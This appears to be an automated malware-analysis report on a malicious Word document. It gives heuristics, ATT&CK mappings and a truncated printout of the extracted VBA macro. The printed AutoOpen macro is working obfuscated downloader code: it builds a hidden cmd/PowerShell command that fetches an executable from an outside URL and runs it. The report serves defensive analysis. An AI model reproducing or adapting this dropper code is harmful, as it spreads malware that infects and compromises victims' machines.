Verdict: MALICIOUS
Risk Score: 82

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a shell command, likely to download and run a second-stage payload. The obfuscated nature of the script and lack of clear indicators prevent definitive family attribution.
Heuristics (4)

- VBA macros detected (severity: medium; 1 related finding) [OLE_VBA_MACROS]: Document contains VBA macro code.
- AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (severity: info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4699 bytes |

SHA-256: 60b71e064a16fd3708e75236714c483e2efb4b5db525229e5612282789e1cf82
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "EqGaisUUUhjoRu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const EBQEXlZG = 0
Dim SOuBjD(5)
SOuBjD(0) = Left(RzNihfl, 96)
SOuBjD(1) = Mid(pmIGtHHh, 607, 476)
SOuBjD(2) = Right(nizQpiWD, 701)
SOuBjD(3) = Right(nizQpiWD, 701)
SOuBjD(4) = Left(RzNihfl, 96)
Dim aZbiz(5)
aZbiz(0) = Mid(pmIGtHHh, 607, 476)
aZbiz(1) = MidB(IohwPYE, 228, 409)
aZbiz(2) = MidB(IohwPYE, 228, 409)
aZbiz(3) = Left(RzNihfl, 96)
aZbiz(4) = Mid(pmIGtHHh, 607, 476)
Dim hdVXv(5)
hdVXv(0) = Left(RzNihfl, 96)
hdVXv(1) = Mid(pmIGtHHh, 607, 476)
hdVXv(2) = Left(RzNihfl, 96)
hdVXv(3) = Mid(pmIGtHHh, 607, 476)
hdVXv(4) = Left(RzNihfl, 96)
Dim hdqwO(4)
hdqwO(0) = MidB(IohwPYE, 228, 409)
hdqwO(1) = Mid(pmIGtHHh, 607, 476)
hdqwO(2) = Mid(pmIGtHHh, 607, 476)
hdqwO(3) = Right(nizQpiWD, 701)
Dim VuVbFY(5)
VuVbFY(0) = MidB(IohwPYE, 228, 409)
VuVbFY(1) = Left(RzNihfl, 96)
VuVbFY(2) = Left(RzNihfl, 96)
VuVbFY(3) = Left(RzNihfl, 96)
VuVbFY(4) = Mid(pmIGtHHh, 607, 476)
Dim EKzlw(2)
EKzlw(0) = Left(RzNihfl, 96)
EKzlw(1) = MidB(IohwPYE, 228, 409)
Dim zVLUVt(2)
zVLUVt(0) = MidB(IohwPYE, 228, 409)
zVLUVt(1) = Right(nizQpiWD, 701)
Shell@ OPanWpST + iKszJaRiXO + jSqqvIwbmarHi, CInt(EBQEXlZG)
Dim HndoLU(2)
HndoLU(0) = MidB(IohwPYE, 228, 409)
HndoLU(1) = Left(RzNihfl, 96)
Dim ksZGq(5)
ksZGq(0) = Mid(pmIGtHHh, 607, 476)
ksZGq(1) = Right(nizQpiWD, 701)
ksZGq(2) = Left(RzNihfl, 96)
ksZGq(3) = MidB(IohwPYE, 228, 409)
ksZGq(4) = MidB(IohwPYE, 228, 409)
End Sub
Attribute VB_Name = "hKjINDUialRTk"
Function OPanWpST()
Dim pjHfHG(2)
pjHfHG(0) = Mid(pmIGtHHh, 607, 476)
pjHfHG(1) = Mid(pmIGtHHh, 607, 476)
Dim uUPMlM(4)
uUPMlM(0) = MidB(IohwPYE, 228, 409)
uUPMlM(1) = MidB(IohwPYE, 228, 409)
uUPMlM(2) = Left(RzNihfl, 96)
uUPMlM(3) = Left(RzNihfl, 96)
KKtjM = Format(Chr(4 + 14 + 14 + 9 + 58)) + "md /V" + "/" + Format(Chr(3 + 9 + 10 + 6 + 39)) + Format(Chr(1 + 4 + 4 + 2 + 23)) + "^se^t" + " ^8^y^au= " + "^ ^ ^ ^ ^ ^ ^ " + "^ ^}}^{h" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "ta" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "}" + ";^kaerb;^k^PM$^ ^m^e^tI-e^k^ov" + "nI;)^k^P^M^" + "$ ,n^Qf$(^e^" + "l^i^F^d^ao^ln^woD^.^J^iY^$^"
Dim cIDVPX(4)
cIDVPX(0) = Left(RzNihfl, 96)
cIDVPX(1) = MidB(IohwPYE, 228, 409)
cIDVPX(2) = Left(RzNihfl, 96)
cIDVPX(3) = Mid(pmIGtHHh, 607, 476)
Dim XMbWcE(2)
XMbWcE(0) = Left(RzNihfl, 96)
XMbWcE(1) = Right(nizQpiWD, 701)
QciSBdhlW = "{yr^t^{)IB" + Format(Chr(3 + 9 + 10 + 6 + 39)) + "^$ ni^ n^Q^f^$(^h" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^a^ero^f" + ";'ex^e.^'^+^YZ^h$^+'^\'^+" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^ilb^up:vne^$^=^k^P^M^$;^'8" + "^69'^ =^ ^Y^Zh$^;)'@'(^ti^lpS." + "^'^sap^.6^x^a^m" + "^ak=l?^" + "php.fmiren/B^A^D/^mo" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^.ojps" + "^o^e^in" + "^av//:^ptt^h'=IB" + Format(Chr(3 + 9 + 10 + 6 + 39)) + "^$^;tne^i^" + "l" + Format(Chr(3 + 9 + 10 + 6 + 39)) + "^b^eW.^teN "
Dim lirkS(4)
lirkS(0) = Right(nizQpiWD, 701)
lirkS(1) = MidB(IohwPYE, 228, 409)
lirkS(2) = Mid(pmIGtHHh, 607, 476)
lirkS(3) = Right(nizQpiWD, 701)
mVhpNG = "t" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^ej^bo^-wen^=J" + "iY$ llehsrew^op&&" + "^f^or /^L %S ^in " + "(^259;-^1^;0)^d^o" + " ^se^t ^L^FY" + "=!^L^FY!"
Dim mziAzU(4)
mziAzU(0) = Right(nizQpiWD, 701)
mziAzU(1) = Mid(pmIGtHHh, 607, 476)
mziAzU(2) = Right(nizQpiWD, 701)
mziAzU(3) = Mid(pmIGtHHh, 607, 476)
Dim kKoIEW(5)
kKoIEW(0) = Left(RzNihfl, 96)
kKoIEW(1) = Right(nizQpiWD, 701)
kKoIEW(2) = Mid(pmIGtHHh, 607, 476)
kKoIEW(3) = MidB(IohwPYE, 228, 409)
kKoIEW(4) = Left(RzNihfl, 96)
Dim LwAkM(4)
LwAkM(0) = Left(RzNihfl, 96)
LwAkM(1) = Left(RzNihfl, 96)
LwAkM(2) = Mid(pmIGtHHh, 607, 476)
LwAkM(3) = Mid(pmIGtHHh, 607, 476)
YwSkUNNic = "!^8^y^au:~%S,1!&&^if %S==^" + "0 " + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^a^l^l %^L^FY:*^LFY^!^=%" + Format(
```

... (truncated)